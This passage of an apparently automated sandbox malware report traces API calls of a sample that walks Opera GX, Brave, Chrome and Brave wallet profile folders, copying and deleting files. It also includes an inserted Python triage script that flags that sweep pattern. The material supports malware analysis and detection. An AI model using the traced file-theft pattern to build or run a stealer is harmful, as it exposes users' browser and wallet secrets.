                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,0035E264,?,?,0035E266), ref: 0034BAA0
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,0035E264,?,?,0035E264,?,00000000,?,?,?,0035E264,?,?), ref: 0034BC20
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Preferences), ref: 0034BC3A
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034BCF4
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0034BDB4
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0034BDE7
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034B5E5: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034B6A1
                                                                                                                                                                                        • Part of subcall function 0034B5E5: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0034B6F8
                                                                                                                                                                                        • Part of subcall function 0034B5E5: RtlAllocateHeap.NTDLL(00000000), ref: 0034B6FF
                                                                                                                                                                                        • Part of subcall function 0034B957: StrCmpCA.SHLWAPI(?), ref: 0034BE55
                                                                                                                                                                                        • Part of subcall function 0034B957: StrCmpCA.SHLWAPI(00000000), ref: 0034BE6E
                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0034C375
                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0034C386
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$File$Find$CopyHeaplstrcatlstrlen$AllocateCloseDeleteFirstNextProcess
                                                                                                                                                                                      • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences$d5$f5
                                                                                                                                                                                      • API String ID: 1925285837-3618002337
                                                                                                                                                                                      • Opcode ID: 2cc66edc914313a54b541a8a3c71df1cbca029382fcf4526fc1012e085a134ab
                                                                                                                                                                                      • Instruction ID: 8406eed7e03b5f07313d9244970b6416e2c0d160132222a37fd87f0361261927
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cc66edc914313a54b541a8a3c71df1cbca029382fcf4526fc1012e085a134ab
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6352F871900108ABDF26FBB0DC96EEE77B8BF15304F4045A5F906AE191EE34AB49CB51

Control-flow Graph
control_flow_graph 2454 3532cd-353336 call 35a2d0 wsprintfA FindFirstFileA memset * 2 2457 353692-35369e call 341301 2454->2457 2458 35333c 2454->2458 2459 353341-353355 StrCmpCA 2458->2459 2461 353671-353683 FindNextFileA 2459->2461 2462 35335b-35336f StrCmpCA 2459->2462 2461->2459 2464 353689-35368c FindClose 2461->2464 2462->2461 2465 353375-3533b1 wsprintfA StrCmpCA 2462->2465 2464->2457 2466 3533b3-3533cb wsprintfA 2465->2466 2467 3533cd-3533dc wsprintfA 2465->2467 2468 3533df-35340c memset lstrcatA 2466->2468 2467->2468 2469 35342b-353435 strtok_s 2468->2469 2470 353437-353467 memset lstrcatA 2469->2470 2471 35340e-35341f 2469->2471 2472 353572-35357c strtok_s 2470->2472 2476 353425-35342a 2471->2476 2477 3535ff-353605 2471->2477 2473 353582 2472->2473 2474 35346c-35347c PathMatchSpecA 2472->2474 2473->2477 2478 353482-353553 call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 call 34e766 DeleteFileA call 34e766 CopyFileA call 34e766 call 34fa29 call 35a350 2474->2478 2479 35356c-353571 2474->2479 2476->2469 2477->2461 2481 353607-353613 2477->2481 2521 353555-353567 call 34e766 DeleteFileA call 34e5e8 2478->2521 2522 353584-353593 2478->2522 2479->2472 2481->2464 2482 353615-35361d 2481->2482 2482->2461 2484 35361f-353666 call 341324 call 3532cd 2482->2484 2492 35366b 2484->2492 2492->2461 2521->2479 2524 35369f-3536a7 call 34e5e8 2522->2524 2525 353599-3535b9 call 34e5b4 call 3469a2 2522->2525 2524->2457 2534 3535f7-3535fa call 34e5e8 2525->2534 2535 3535bb-3535f2 call 34e57d call 341324 call 3526f8 call 34e5e8 2525->2535 2534->2477 2535->2534
APIs
• wsprintfA.USER32 ref: 003532EC
• FindFirstFileA.KERNEL32(?,?), ref: 00353303
• memset.MSVCRT ref: 0035331C
• memset.MSVCRT ref: 0035332A
• StrCmpCA.SHLWAPI(?,0035E258), ref: 0035334D
• StrCmpCA.SHLWAPI(?,0035E254), ref: 00353367
• wsprintfA.USER32 ref: 0035338B
• StrCmpCA.SHLWAPI(?,0035E266), ref: 0035339C
• wsprintfA.USER32 ref: 003533C2
• wsprintfA.USER32 ref: 003533D6
• memset.MSVCRT ref: 003533E8
• lstrcatA.KERNEL32(?,?), ref: 003533FA
• strtok_s.MSVCRT ref: 0035342B
• memset.MSVCRT ref: 00353440
• lstrcatA.KERNEL32(?,?), ref: 00353455
• PathMatchSpecA.SHLWAPI(?,00000000), ref: 00353474
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
• DeleteFileA.KERNEL32(00000000,00000000,?,?,?,?,0035E264,?,00000000,0035E266), ref: 00353513
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 0035352B
  • Part of subcall function 0034FA29: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00361D84,?,?,?,0035353F,00000000), ref: 0034FA44
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00353548
• DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000), ref: 0035355E
• strtok_s.MSVCRT ref: 00353572
• FindNextFileA.KERNELBASE(?,?), ref: 0035367B
• FindClose.KERNEL32(?), ref: 0035368C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: File$lstrcatlstrcpymemsetwsprintf$Find$Deletestrtok_s$CloseCopyCreateFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
• String ID: %s\%s$%s\%s\%s$%s\*.*
• API String ID: 824052866-1853381274
• Opcode ID: 1f1735c1810a439e3a40271367682ea3b4b550a6fae24825a0c7b2f9a1adad42
• Instruction ID: 62d44e79c34e1edf36b2ac7b13a9daf4c05707c0c2d50e1b1dbd87347df50d76
• Opcode Fuzzy Hash: 1f1735c1810a439e3a40271367682ea3b4b550a6fae24825a0c7b2f9a1adad42
• Instruction Fuzzy Hash: 56B120B290010DABDF22EBA4CC85DEE77BCFF04345F404565F919EA061EA31AB59CB61
APIs
• wsprintfA.USER32 ref: 00354005
• FindFirstFileA.KERNEL32(?,?), ref: 0035401C
• StrCmpCA.SHLWAPI(?,0035E258), ref: 00354049
• StrCmpCA.SHLWAPI(?,0035E254), ref: 00354063
• wsprintfA.USER32 ref: 00354083
• StrCmpCA.SHLWAPI(?,0035E266), ref: 00354090
• wsprintfA.USER32 ref: 003540AD
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
  • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
  • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
• wsprintfA.USER32 ref: 003540BD
• PathMatchSpecA.SHLWAPI(?,?), ref: 003540D0
• lstrcatA.KERNEL32(?,?,000003E8), ref: 003540FC
• lstrcatA.KERNEL32(?,0035E264), ref: 0035410A
• lstrcatA.KERNEL32(?,?), ref: 0035411A
• lstrcatA.KERNEL32(?,0035E264), ref: 00354128
• lstrcatA.KERNEL32(?,?), ref: 0035413C
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 003541D4
• DeleteFileA.KERNEL32(00000000), ref: 00354241
• FindNextFileA.KERNEL32(?,?), ref: 0035428B
• FindClose.KERNEL32(?), ref: 0035429C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$Filewsprintf$Find$CloseCopyCreateDeleteFirstMatchNextObjectOpenPathSingleSpecThreadWaitlstrcpy
                                                                                                                                                                                      • String ID: %s\%s$%s\*$*.*$d5$f5
                                                                                                                                                                                      • API String ID: 2476262310-2865965815
                                                                                                                                                                                      • Opcode ID: 58bbe0f60ed441b85321e62e09bcd3f74b226c5b6338536ecd9c77ca54e1ac94
                                                                                                                                                                                      • Instruction ID: d96d0d125f3c25caf412bd5935161d44c55971483b8784b25010bdc37864882f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 58bbe0f60ed441b85321e62e09bcd3f74b226c5b6338536ecd9c77ca54e1ac94
                                                                                                                                                                                      • Instruction Fuzzy Hash: C4713A72900119ABDF16EBF0DD49DEE77BCBF04305F4445A5F50AEA061EA31AA89CB90
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID:
• String ID: UT$f5
• API String ID: 0-2751378739
• Opcode ID: c01d3318bffb665f33ef109aadae73e4cdb9b87eb1bfff5cb64df7525f9aa14f
• Instruction ID: 33b1d4f22d69e749f6def3c9272ddb2971835f3d5901a555fdbd146b51d0e758
• Opcode Fuzzy Hash: c01d3318bffb665f33ef109aadae73e4cdb9b87eb1bfff5cb64df7525f9aa14f
• Instruction Fuzzy Hash: A402E571D04749DFCF22DF64C840BAEBBB9AF44302F1544AEE84A97261DB309B89CB51
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0035E264,?,?,?,0035E264,?,?,00000000,?,00000000), ref: 0034156F
• StrCmpCA.SHLWAPI(?,0035E258), ref: 0034158D
• StrCmpCA.SHLWAPI(?,0035E254), ref: 003415A7
• FindFirstFileA.KERNEL32(00000000,?,?,?,?,0035E264,?,?,?,0035E264,?,?,?,0035E264,?,?), ref: 00341690
  • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
• DeleteFileA.KERNEL32(00000000), ref: 003418D2
• FindNextFileA.KERNEL32(00000000,?), ref: 0034190E
• FindClose.KERNEL32(00000000), ref: 0034191D
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034185C
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
  • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
  • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
  • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
  • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00341B3D
  • Part of subcall function 003469A2: LocalFree.KERNEL32(?,?,0035E266), ref: 00346A23
• DeleteFileA.KERNEL32(00000000), ref: 00341BAD
  • Part of subcall function 003526F8: Sleep.KERNEL32(000003E8,?,?,?,?,00361678,003613FC,00361ECC), ref: 0035276D
• FindNextFileA.KERNEL32(?,?), ref: 00341BF0
• FindClose.KERNEL32(?), ref: 00341C01
  • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
  • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
  • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034F80B: GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
  • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectOpenPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
• String ID: \*.*$d5$f5
• API String ID: 1356492569-872103852
• Opcode ID: 531e4315485bc0be32ed18e66c1330825977eb9fa7e74f99a87b95eef40d72a0
• Instruction ID: fd217656e117b1902cfc09c5444dd0c3734ca142add6251812bdbe3cf4d9860f
• Opcode Fuzzy Hash: 531e4315485bc0be32ed18e66c1330825977eb9fa7e74f99a87b95eef40d72a0
• Instruction Fuzzy Hash: 3532D772900118AADF16EBA0DC96DEE73BCBF25304F4545A5F506AE091EE34BF89CB50
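The APIs listing above (call sites 0034156F to 00341C01) is printed in the report's own order, not in address order, and it mixes the function's direct calls with calls made by its callees ("Part of subcall function"). The following Python is an added triage example, not part of the Joe Sandbox report and not code from the sample: it parses a subset of those lines (copied verbatim from the listing and embedded as constructed input), sorts the direct calls by call-site address, and applies a simple rule. The rule names FILE_SWEEP and FILE_ACTIONS and the verdict strings are the example's own. Sorting by address shows two FindFirstFileA loops, each closed by FindNextFileA and FindClose and each containing a CopyFileA followed by a DeleteFileA, which is the shape of a recursive copy-then-delete sweep. The two StrCmpCA calls right after the first FindFirstFileA are where such a walker normally skips the "." and ".." entries, but the report gives the compared strings only as addresses (0035E258, 0035E254), so that stays an inference rather than a fact from the page.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: a subset of the lines from the APIs listing of the
# function above (call sites 0034156F..00341C01), copied verbatim from the
# report. "Part of subcall function" lines belong to callees, not to the
# function itself.
REPORT_LINES = """\
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0035E264,?,?,?,0035E264,?,?,00000000,?,00000000), ref: 0034156F
• StrCmpCA.SHLWAPI(?,0035E258), ref: 0034158D
• StrCmpCA.SHLWAPI(?,0035E254), ref: 003415A7
• FindFirstFileA.KERNEL32(00000000,?,?,?,?,0035E264,?,?,?,0035E264,?,?,?,0035E264,?,?), ref: 00341690
  • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
• DeleteFileA.KERNEL32(00000000), ref: 003418D2
• FindNextFileA.KERNEL32(00000000,?), ref: 0034190E
• FindClose.KERNEL32(00000000), ref: 0034191D
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034185C
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00341B3D
• DeleteFileA.KERNEL32(00000000), ref: 00341BAD
  • Part of subcall function 003526F8: Sleep.KERNEL32(000003E8,?,?,?,?,00361678,003613FC,00361ECC), ref: 0035276D
• FindNextFileA.KERNEL32(?,?), ref: 00341BF0
• FindClose.KERNEL32(?), ref: 00341C01
  • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
"""

# One report line: optional bullet, optional "Part of subcall function <addr>:",
# then Api.MODULE, an optional "(args)" list, and the call-site address after "ref:".
LINE_RE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[\w-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    ref: int                  # call-site address
    caller: Optional[int]     # subcall function address, None for a direct call
    args: Tuple[str, ...]

    @property
    def direct(self) -> bool:
        return self.caller is None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report lines into ApiCall records; fail loudly on a line we cannot
    read instead of silently dropping evidence."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised report line: {line!r}")
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        calls.append(ApiCall(
            api=m["api"], module=m["module"], ref=int(m["ref"], 16),
            caller=int(m["caller"], 16) if m["caller"] else None, args=args))
    return calls


def call_order(calls: List[ApiCall]) -> List[str]:
    """Direct calls in call-site address order. The report lists calls in
    analysis order; sorting by address approximates program order (loop
    back-edges and compiler layout can still reorder, so treat it as a hint)."""
    return [c.api for c in sorted((c for c in calls if c.direct), key=lambda c: c.ref)]


def count_find_loops(calls: List[ApiCall]) -> int:
    """Every FindFirstFile* among the direct calls opens one enumeration loop."""
    return sum(1 for api in call_order(calls) if api.startswith("FindFirstFile"))


# The example's own rule names and verdict strings (assumptions, not from the report).
FILE_SWEEP = {"FindFirstFileA", "FindNextFileA", "FindClose"}
FILE_ACTIONS = {"CopyFileA", "DeleteFileA"}


def classify(calls: List[ApiCall]) -> List[str]:
    """Triage verdicts drawn only from the function's direct calls, so a
    callee's behaviour is not credited to the caller."""
    direct = {c.api for c in calls if c.direct}
    verdicts = []
    if FILE_SWEEP <= direct and direct & FILE_ACTIONS:
        verdicts.append("directory sweep that copies/deletes files")
    if count_find_loops(calls) > 1:
        verdicts.append("nested enumeration (more than one Find loop)")
    return verdicts


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    for api in call_order(parsed):
        print(api)
    print(classify(parsed))
```

The parser deliberately tolerates the one line that has no argument list (_MSFOpenExW.MSPDB140-MSVCRT) and keeps callee calls separate from the function's own, because a triage rule that counted the callee's CreateFileA/ReadFile as this function's behaviour would overstate what the listing supports.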
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0035E266,00000000,?,?), ref: 00349BB9
